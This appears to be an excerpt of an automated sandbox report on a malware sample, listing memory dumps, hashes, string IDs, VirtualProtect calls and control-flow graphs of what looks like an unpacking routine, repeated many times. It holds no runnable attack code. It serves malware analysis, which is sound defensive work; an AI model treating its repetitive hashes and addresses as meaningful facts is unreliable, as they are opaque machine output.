                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 026932607235a52f7d863d2866d8b306e01cc66e42a3e4510ad1a7c595773086
                                                                                                                        • Instruction ID: df8e3fcac33211f4c5b008abac8f8c68894361ab22a79a16978cd784f9a3db6b
                                                                                                                        • Opcode Fuzzy Hash: 026932607235a52f7d863d2866d8b306e01cc66e42a3e4510ad1a7c595773086
                                                                                                                        • Instruction Fuzzy Hash: BBF105B2D042649BF7208624DC84BEB7A79EF90310F1480FED94D67281D6BD5FC68B66

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: e8ceced950599952926a2a7048b19e50167d42c1a8fc9a1751870ae93f3295a2
                                                                                                                        • Instruction ID: b45db600def9cba6b152f9bae71686f50ffbe3404f9396e81384a605f94926e6
                                                                                                                        • Opcode Fuzzy Hash: e8ceced950599952926a2a7048b19e50167d42c1a8fc9a1751870ae93f3295a2
                                                                                                                        • Instruction Fuzzy Hash: 3DE146B2C042649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC68BA7

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 369 407f65-407f8f 371 407f95-407fa2 369->371 372 40801d-408068 369->372 371->372 373 407fa4-408018 call 407fbb 371->373 374 408079-4080ca call 408098 372->374 375 40806a-408074 372->375 392 407f78-40800d 373->392 388 4080d8-4080fd call 4080fe 374->388 389 4080cc-4080d6 374->389 377 408114-40811b 375->377 380 40815d 377->380 381 40811d-40815b 377->381 386 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 380->386 381->386 416 408828-408a77 call 4089ff 386->416 417 4094b9-4095cb call 4094db call 40950b call 4095cc 386->417 389->377 398 408016 392->398 399 40800f 392->399 398->372 399->392 433 408a79-408ab5 416->433 434 408aba-408ae7 call 408ae8 416->434 448 409f60-409f62 ExitProcess 417->448 441 408e4f-408e56 433->441 434->441 444 408e58-408e94 441->444 445 408e99-408ecf call 408ed1 441->445 444->448 445->448
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 2fe339eb59fc586c2937a91252676beb4543a3d4f9bdffa9c775f95e98139192
                                                                                                                        • Instruction ID: f40b09c2810a9fa6f02b2eec4802a077c4c1291dc3e09875bf3ed72bb553ef21
                                                                                                                        • Opcode Fuzzy Hash: 2fe339eb59fc586c2937a91252676beb4543a3d4f9bdffa9c775f95e98139192
                                                                                                                        • Instruction Fuzzy Hash: 8EE135B1C042649AF7208624DC447EB7A79DF51314F1440FED98DA62C1DABE0FC68B67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 452 406e30-406e4d 453 406e52-406ece call 406e68 452->453 459 406ed0-406ee0 453->459 460 406ee5-406eef 453->460 464 406f68-406f6f 459->464 462 406ef5-406f02 460->462 463 406dde-406e4d 460->463 462->463 465 406f08-406f1f call 406f1b 462->465 463->453 466 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 464->466 467 406fb4-406fcb call 406fd0 464->467 465->466 475 406f21-406f44 465->475 499 408828-408a77 call 4089ff 466->499 500 4094b9-4095cb call 4094db call 40950b call 4095cc 466->500 479 406f52 475->479 480 406f46-406f50 475->480 482 406f5c-406f62 479->482 480->482 482->464 516 408a79-408ab5 499->516 517 408aba-408ae7 call 408ae8 499->517 531 409f60-409f62 ExitProcess 500->531 524 408e4f-408e56 516->524 517->524 527 408e58-408e94 524->527 528 408e99-408ecf call 408ed1 524->528 527->531 528->531
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3687113455
                                                                                                                        • Opcode ID: e76747aa6b57113d2716c669ea92c047467e31ea4db9a62e7ffb1e10252d0d64
                                                                                                                        • Instruction ID: 220cd9281a29cea94c4a91926213e167e5dbe57d70c329742c206d8b20fd43a8
                                                                                                                        • Opcode Fuzzy Hash: e76747aa6b57113d2716c669ea92c047467e31ea4db9a62e7ffb1e10252d0d64
                                                                                                                        • Instruction Fuzzy Hash: E1E125A2C042649AF7208624DC44BEB7A78EF50314F1440FED94DA62C1D6BE5FC6CBA7

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 535 406e40-406e4d 536 406e52-406ece call 406e68 535->536 542 406ed0-406ee0 536->542 543 406ee5-406eef 536->543 547 406f68-406f6f 542->547 545 406ef5-406f02 543->545 546 406dde-406e4d 543->546 545->546 548 406f08-406f1f call 406f1b 545->548 546->536 549 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 547->549 550 406fb4-406fcb call 406fd0 547->550 548->549 558 406f21-406f44 548->558 582 408828-408a77 call 4089ff 549->582 583 4094b9-4095cb call 4094db call 40950b call 4095cc 549->583 562 406f52 558->562 563 406f46-406f50 558->563 565 406f5c-406f62 562->565 563->565 565->547 599 408a79-408ab5 582->599 600 408aba-408ae7 call 408ae8 582->600 614 409f60-409f62 ExitProcess 583->614 607 408e4f-408e56 599->607 600->607 610 408e58-408e94 607->610 611 408e99-408ecf call 408ed1 607->611 610->614 611->614
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3687113455
                                                                                                                        • Opcode ID: 38b9c65dbf6283e9cc1faf9955d89fe7368ed5d215a0d58d7d950dcf7ce02bd7
                                                                                                                        • Instruction ID: 922c944672f40ff5276d803d9d834a580e9c1310f30415da19b8596a71a819f2
                                                                                                                        • Opcode Fuzzy Hash: 38b9c65dbf6283e9cc1faf9955d89fe7368ed5d215a0d58d7d950dcf7ce02bd7
                                                                                                                        • Instruction Fuzzy Hash: 44E123A2C082649AF7208624DC44BEB7A78EF51314F1440FED94DA62C1D6BE5FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 618 406e50-406e5d 619 406e60-406ece 618->619 622 406ed0-406ee0 619->622 623 406ee5-406eef 619->623 627 406f68-406f6f 622->627 625 406ef5-406f02 623->625 626 406dde-406e5d call 406e68 623->626 625->626 629 406f08-406f1f call 406f1b 625->629 626->619 630 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 627->630 631 406fb4-406fcb call 406fd0 627->631 629->630 641 406f21-406f44 629->641 665 408828-408a77 call 4089ff 630->665 666 4094b9-4095cb call 4094db call 40950b call 4095cc 630->666 645 406f52 641->645 646 406f46-406f50 641->646 648 406f5c-406f62 645->648 646->648 648->627 682 408a79-408ab5 665->682 683 408aba-408ae7 call 408ae8 665->683 697 409f60-409f62 ExitProcess 666->697 690 408e4f-408e56 682->690 683->690 693 408e58-408e94 690->693 694 408e99-408ecf call 408ed1 690->694 693->697 694->697
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: a1c9d9ecc7b5141984307abe64710c3eb2a70715d632bebb7b06ef5f539f95a0
                                                                                                                        • Instruction ID: f472c5bf6cce1d32c270796867ad13836725e5baa778bd72db952dc4fd989fbb
                                                                                                                        • Opcode Fuzzy Hash: a1c9d9ecc7b5141984307abe64710c3eb2a70715d632bebb7b06ef5f539f95a0
                                                                                                                        • Instruction Fuzzy Hash: B9E134A2C082649AF7208624DC44BEB7A78EF51314F1440FED94DA62C1D6BE5FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 701 407500-407524 702 407535-407586 701->702 703 407526-407530 701->703 711 407594-4075c6 call 4075b5 702->711 712 407588 702->712 705 4075d0-4075d7 703->705 707 407619 705->707 708 4075d9-407631 705->708 707->707 718 4076d3-407714 call 407716 708->718 719 407637-407690 708->719 711->705 712->711 719->718 725 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 719->725 751 408828-408a77 call 4089ff 725->751 752 4094b9-4095cb call 4094db call 40950b call 4095cc 725->752 768 408a79-408ab5 751->768 769 408aba-408ae7 call 408ae8 751->769 783 409f60-409f62 ExitProcess 752->783 776 408e4f-408e56 768->776 769->776 779 408e58-408e94 776->779 780 408e99-408ecf call 408ed1 776->780 779->783 780->783
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 636b56e18b7d4412ab0a9b9136e29d628baca83dc62632dedea95a0b5513a5e3
                                                                                                                        • Instruction ID: 08101456153ba46f1365cff4e30746e8e286d4fed58f6373a9dfc3cd762e9e30
                                                                                                                        • Opcode Fuzzy Hash: 636b56e18b7d4412ab0a9b9136e29d628baca83dc62632dedea95a0b5513a5e3
                                                                                                                        • Instruction Fuzzy Hash: 32E133B2C082649AF7208624DC44BEB7A69DF51314F1440FED94D662C1DABE1FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 787 407c35-407c4f 789 407c51-407c8f 787->789 790 407c94-407ca6 787->790 794 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 789->794 792 407ca8-407cb4 790->792 793 407cb9-407d0a call 407ce7 790->793 792->794 799 407d0c-407d4a 793->799 800 407d4f-407d90 793->800 827 408828-408a77 call 4089ff 794->827 828 4094b9-4095cb call 4094db call 40950b call 4095cc 794->828 799->794 805 407d92-407dd0 800->805 806 407dd5-407e99 800->806 805->794 813 408162-408168 806->813 814 407e9f-407eb5 call 407eb6 806->814 813->794 814->813 844 408a79-408ab5 827->844 845 408aba-408ae7 call 408ae8 827->845 859 409f60-409f62 ExitProcess 828->859 852 408e4f-408e56 844->852 845->852 855 408e58-408e94 852->855 856 408e99-408ecf call 408ed1 852->856 855->859 856->859
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
